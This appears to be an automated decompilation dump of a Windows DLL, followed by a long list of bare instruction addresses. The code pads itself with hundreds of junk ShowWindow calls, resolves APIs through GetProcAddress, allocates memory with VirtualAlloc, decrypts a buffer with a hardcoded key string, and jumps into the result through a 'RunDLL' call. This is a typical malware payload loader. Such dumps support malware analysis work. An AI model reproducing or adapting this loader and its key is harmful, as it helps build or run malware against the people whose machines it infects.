				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				_t1284 = _v84;
				if(_v64 < 0x10) {
					_t1284 =  &_v84;
				}
				_push(0x11);
				_t1285 = E10001050(_t1284);
				_t1367 = GetProcAddress;
				_t1378 = _t1377 + 8;
				 *0x1001c440 = GetProcAddress(_v336, _t1285);
				_t1288 = _v56;
				if(_v36 < 0x10) {
					_t1288 =  &_v56;
				}
				_t1289 = GetProcAddress(_v336, _t1288);
				_t1358 =  &_v328;
				_push( &_v328);
				 *0x1001c44c = _t1289;
				_push(3);
				_push( &_v324);
				_push(0x10000000);
				if( *0x1001c440() >= 0) {
					_t1358 =  &_v348;
					 *0x1001c44c(0x10000000, _v344,  &_v348,  &_v356);
				}
				if(WriteFileGather(0, 0, 0, 0, 0) == 0) {
					_t1294 = E10007666();
					_t1296 = VirtualAlloc(0, _v356, _t1294 * E10007666(), "64"); // executed
					_t1367 = _t1296;
					E10006BF0(0, 0x10, _t1296, _t1296, _v348, _v356);
					E10001140(0, 0x10, __eflags, "G1B3gZ@zq*H_ZfAmhTkSeVF4VAg4Pd2B%miXGSaKK>>k+Xyaiws&v#d4", 0x39,  &_v352);
					E10002330(_t1296, _v356,  &_v352);
					_t1378 = _t1378 + 0x30;
					_t1302 = E100047B0(_t1367, _v356);
					_t1303 = E10004380(); // executed
					 *_t1303(_t1302, "RunDLL", "64", E10007666(), "64");
					_t1358 =  *0x1001b040; // 0x100161c0
					_t1305 = MessageBoxA(0, _t1358, 0, 0);
					__eflags = _v96 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v108);
						_t1378 = _t1378 + 4;
					}
					_v88 = 0xf;
					_v92 = 0;
					_v108 = 0;
					__eflags = _v200 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v220);
						_t1378 = _t1378 + 4;
					}
					_v200 = 0xf;
					_v204 = 0;
					_v220 = 0;
					__eflags = _v116 - 0x10;
					if(__eflags >= 0) {
						_t1358 = _v136;
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v136);
						_t1378 = _t1378 + 4;
					}
					_v116 = 0xf;
					_v120 = 0;
					_v136 = 0;
					__eflags = _v256 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v276);
						_t1378 = _t1378 + 4;
					}
					_v256 = 0xf;
					_v260 = 0;
					_v276 = 0;
					__eflags = _v172 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v192);
						_t1378 = _t1378 + 4;
					}
					_v172 = 0xf;
					_v176 = 0;
					_v192 = 0;
					__eflags = _v60 - 0x10;
					if(__eflags >= 0) {
						_t1358 = _v80;
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v80);
						_t1378 = _t1378 + 4;
					}
					_v60 = 0xf;
					_v64 = 0;
					_v80 = 0;
					__eflags = _v144 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v164);
						_t1378 = _t1378 + 4;
					}
					_v144 = 0xf;
					_v148 = 0;
					_v164 = 0;
					__eflags = _v228 - 0x10;
					if(__eflags >= 0) {
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v248);
						_t1378 = _t1378 + 4;
					}
					_v228 = 0xf;
					_v232 = 0;
					_v248 = 0;
					__eflags = _v32 - 0x10;
					if(__eflags >= 0) {
						_t1358 = _v52;
						_t1305 = E10006B91(0, 0x10, _t1367, __eflags, _v52);
						_t1378 = _t1378 + 4;
					}
				} else {
					_t1388 = _v80 - 0x10;
					if(_v80 >= 0x10) {
						E10006B91(0, 0x10, _t1367, _t1388, _v100);
						_t1378 = _t1378 + 4;
					}
					_v80 = 0xf;
					_v84 = 0;
					_v100 = 0;
					_t1389 = _v192 - 0x10;
					if(_v192 >= 0x10) {
						_t1358 = _v212;
						E10006B91(0, 0x10, _t1367, _t1389, _v212);
						_t1378 = _t1378 + 4;
					}
					_v192 = 0xf;
					_v196 = 0;
					_v212 = 0;
					_t1390 = _v108 - 0x10;
					if(_v108 >= 0x10) {
						E10006B91(0, 0x10, _t1367, _t1390, _v128);
						_t1378 = _t1378 + 4;
					}
					_v108 = 0xf;
					_v112 = 0;
					_v128 = 0;
					_t1391 = _v248 - 0x10;
					if(_v248 >= 0x10) {
						E10006B91(0, 0x10, _t1367, _t1391, _v268);
						_t1378 = _t1378 + 4;
					}
					_v248 = 0xf;
					_v252 = 0;
					_v268 = 0;
					_t1392 = _v164 - 0x10;
					if(_v164 >= 0x10) {
						_t1358 = _v184;
						E10006B91(0, 0x10, _t1367, _t1392, _v184);
						_t1378 = _t1378 + 4;
					}
					_v164 = 0xf;
					_v168 = 0;
					_v184 = 0;
					_t1393 = _v52 - 0x10;
					if(_v52 >= 0x10) {
						E10006B91(0, 0x10, _t1367, _t1393, _v72);
						_t1378 = _t1378 + 4;
					}
					_v52 = 0xf;
					_v56 = 0;
					_v72 = 0;
					_t1394 = _v136 - 0x10;
					if(_v136 >= 0x10) {
						E10006B91(0, 0x10, _t1367, _t1394, _v156);
						_t1378 = _t1378 + 4;
					}
					_v136 = 0xf;
					_v140 = 0;
					_v156 = 0;
					_t1395 = _v220 - 0x10;
					if(_v220 >= 0x10) {
						_t1358 = _v240;
						E10006B91(0, 0x10, _t1367, _t1395, _v240);
						_t1378 = _t1378 + 4;
					}
					_v220 = 0xf;
					_v224 = 0;
					_v240 = 0;
					_t1396 = _v24 - 0x10;
					if(_v24 >= 0x10) {
						E10006B91(0, 0x10, _t1367, _t1396, _v44);
						_t1378 = _t1378 + 4;
					}
					_t1305 = 0;
				}
				return E10007528(_t1305, 0, _v28 ^ _t1378, _t1358, 0x10, _t1367);
			}

































































































                                                                                                                                0x10002460
                                                                                                                                0x10002466
                                                                                                                                0x1000246d
                                                                                                                                0x1000248d
                                                                                                                                0x10002491
                                                                                                                                0x10002495
                                                                                                                                0x1000249d
                                                                                                                                0x100024a5
                                                                                                                                0x100024ad
                                                                                                                                0x100024b4
                                                                                                                                0x100024bb
                                                                                                                                0x100024c2
                                                                                                                                0x100024d5
                                                                                                                                0x100024dc
                                                                                                                                0x100024e3
                                                                                                                                0x100024ea
                                                                                                                                0x100024fd
                                                                                                                                0x10002504
                                                                                                                                0x1000250b
                                                                                                                                0x10002512
                                                                                                                                0x1000251e
                                                                                                                                0x10002526
                                                                                                                                0x1000252e
                                                                                                                                0x1000253c
                                                                                                                                0x10002545
                                                                                                                                0x1000254f
                                                                                                                                0x10002552
                                                                                                                                0x10002556
                                                                                                                                0x1000255d
                                                                                                                                0x10002562
                                                                                                                                0x10002562
                                                                                                                                0x1000257e
                                                                                                                                0x10002582
                                                                                                                                0x10002589
                                                                                                                                0x10002590
                                                                                                                                0x10002597
                                                                                                                                0x100025a7
                                                                                                                                0x100025ae
                                                                                                                                0x100025b5
                                                                                                                                0x100025b9
                                                                                                                                0x100025cc
                                                                                                                                0x100025d3
                                                                                                                                0x100025da
                                                                                                                                0x100025e1
                                                                                                                                0x100025f4
                                                                                                                                0x100025fb
                                                                                                                                0x10002602
                                                                                                                                0x10002609
                                                                                                                                0x10002615
                                                                                                                                0x1000261d
                                                                                                                                0x10002622
                                                                                                                                0x1000262a
                                                                                                                                0x10002638
                                                                                                                                0x10002646
                                                                                                                                0x1000264f
                                                                                                                                0x10002654
                                                                                                                                0x10002657
                                                                                                                                0x1000265b
                                                                                                                                0x10002662
                                                                                                                                0x10002667
                                                                                                                                0x10002667
                                                                                                                                0x1000266a
                                                                                                                                0x1000266e
                                                                                                                                0x10002672
                                                                                                                                0x10002676
                                                                                                                                0x1000267a
                                                                                                                                0x10002681
                                                                                                                                0x10002686
                                                                                                                                0x10002686
                                                                                                                                0x10002691
                                                                                                                                0x10002695
                                                                                                                                0x10002699
                                                                                                                                0x1000269d
                                                                                                                                0x100026a1
                                                                                                                                0x100026a5
                                                                                                                                0x100026a9
                                                                                                                                0x100026ad
                                                                                                                                0x100026b1
                                                                                                                                0x100026b5
                                                                                                                                0x100026b9
                                                                                                                                0x100026bd
                                                                                                                                0x100026c1
                                                                                                                                0x100026c5
                                                                                                                                0x100026c9
                                                                                                                                0x100026cd
                                                                                                                                0x100026d1
                                                                                                                                0x100026d5
                                                                                                                                0x100026d9
                                                                                                                                0x100026dd
                                                                                                                                0x100026e1
                                                                                                                                0x100026e5
                                                                                                                                0x100026e9
                                                                                                                                0x100026ed
                                                                                                                                0x100026f1
                                                                                                                                0x100026f5
                                                                                                                                0x100026f9
                                                                                                                                0x100026fd
                                                                                                                                0x10002701
                                                                                                                                0x10002705
                                                                                                                                0x10002709
                                                                                                                                0x1000270d
                                                                                                                                0x10002711
                                                                                                                                0x10002715
                                                                                                                                0x10002719
                                                                                                                                0x1000271d
                                                                                                                                0x10002721
                                                                                                                                0x10002725
                                                                                                                                0x10002729
                                                                                                                                0x1000272d
                                                                                                                                0x10002731
                                                                                                                                0x10002735
                                                                                                                                0x10002739
                                                                                                                                0x1000273d
                                                                                                                                0x10002741
                                                                                                                                0x10002745
                                                                                                                                0x10002749
                                                                                                                                0x1000274d
                                                                                                                                0x10002751
                                                                                                                                0x10002755
                                                                                                                                0x10002759
                                                                                                                                0x1000275d
                                                                                                                                0x10002761
                                                                                                                                0x10002765
                                                                                                                                0x10002769
                                                                                                                                0x1000276d
                                                                                                                                0x10002771
                                                                                                                                0x10002775
                                                                                                                                0x10002779
                                                                                                                                0x1000277d
                                                                                                                                0x10002781
                                                                                                                                0x10002785
                                                                                                                                0x10002789
                                                                                                                                0x1000278d
                                                                                                                                0x10002791
                                                                                                                                0x10002795
                                                                                                                                0x10002799
                                                                                                                                0x1000279d
                                                                                                                                0x100027a1
                                                                                                                                0x100027a5
                                                                                                                                0x100027a9
                                                                                                                                0x100027ad
                                                                                                                                0x100027b1
                                                                                                                                0x100027b5
                                                                                                                                0x100027b9
                                                                                                                                0x100027bd
                                                                                                                                0x100027c1
                                                                                                                                0x100027c5
                                                                                                                                0x100027c9
                                                                                                                                0x100027cd
                                                                                                                                0x100027d1
                                                                                                                                0x100027d5
                                                                                                                                0x100027d9
                                                                                                                                0x100027dd
                                                                                                                                0x100027e1
                                                                                                                                0x100027e5
                                                                                                                                0x100027e9
                                                                                                                                0x100027ed
                                                                                                                                0x100027f1
                                                                                                                                0x100027f5
                                                                                                                                0x100027f9
                                                                                                                                0x100027fd
                                                                                                                                0x10002801
                                                                                                                                0x10002805
                                                                                                                                0x10002809
                                                                                                                                0x1000280d
                                                                                                                                0x10002811
                                                                                                                                0x10002815
                                                                                                                                0x10002819
                                                                                                                                0x1000281d
                                                                                                                                0x10002821
                                                                                                                                0x10002825
                                                                                                                                0x10002829
                                                                                                                                0x1000282d
                                                                                                                                0x10002831
                                                                                                                                0x10002835
                                                                                                                                0x10002839
                                                                                                                                0x1000283d
                                                                                                                                0x10002841
                                                                                                                                0x10002845
                                                                                                                                0x10002849
                                                                                                                                0x1000284d
                                                                                                                                0x10002851
                                                                                                                                0x10002855
                                                                                                                                0x10002859
                                                                                                                                0x1000285d
                                                                                                                                0x10002861
                                                                                                                                0x10002865
                                                                                                                                0x10002869
                                                                                                                                0x1000286d
                                                                                                                                0x10002871
                                                                                                                                0x10002875
                                                                                                                                0x10002879
                                                                                                                                0x1000287d
                                                                                                                                0x10002881
                                                                                                                                0x10002885
                                                                                                                                0x10002889
                                                                                                                                0x1000288d
                                                                                                                                0x10002891
                                                                                                                                0x10002895
                                                                                                                                0x10002899
                                                                                                                                0x1000289d
                                                                                                                                0x100028a1
                                                                                                                                0x100028a5
                                                                                                                                0x100028a9
                                                                                                                                0x100028ad
                                                                                                                                0x100028b1
                                                                                                                                0x100028b5
                                                                                                                                0x100028b9
                                                                                                                                0x100028bd
                                                                                                                                0x100028c1
                                                                                                                                0x100028c5
                                                                                                                                0x100028c9
                                                                                                                                0x100028cd
                                                                                                                                0x100028d1
                                                                                                                                0x100028d5
                                                                                                                                0x100028d9
                                                                                                                                0x100028dd
                                                                                                                                0x100028e1
                                                                                                                                0x100028e5
                                                                                                                                0x100028e9
                                                                                                                                0x100028ed
                                                                                                                                0x100028f1
                                                                                                                                0x100028f5
                                                                                                                                0x100028f9
                                                                                                                                0x100028fd
                                                                                                                                0x10002901
                                                                                                                                0x10002905
                                                                                                                                0x10002909
                                                                                                                                0x1000290d
                                                                                                                                0x10002911
                                                                                                                                0x10002915
                                                                                                                                0x10002919
                                                                                                                                0x1000291d
                                                                                                                                0x10002921
                                                                                                                                0x10002925
                                                                                                                                0x10002929
                                                                                                                                0x1000292d
                                                                                                                                0x10002931
                                                                                                                                0x10002935
                                                                                                                                0x10002939
                                                                                                                                0x1000293d
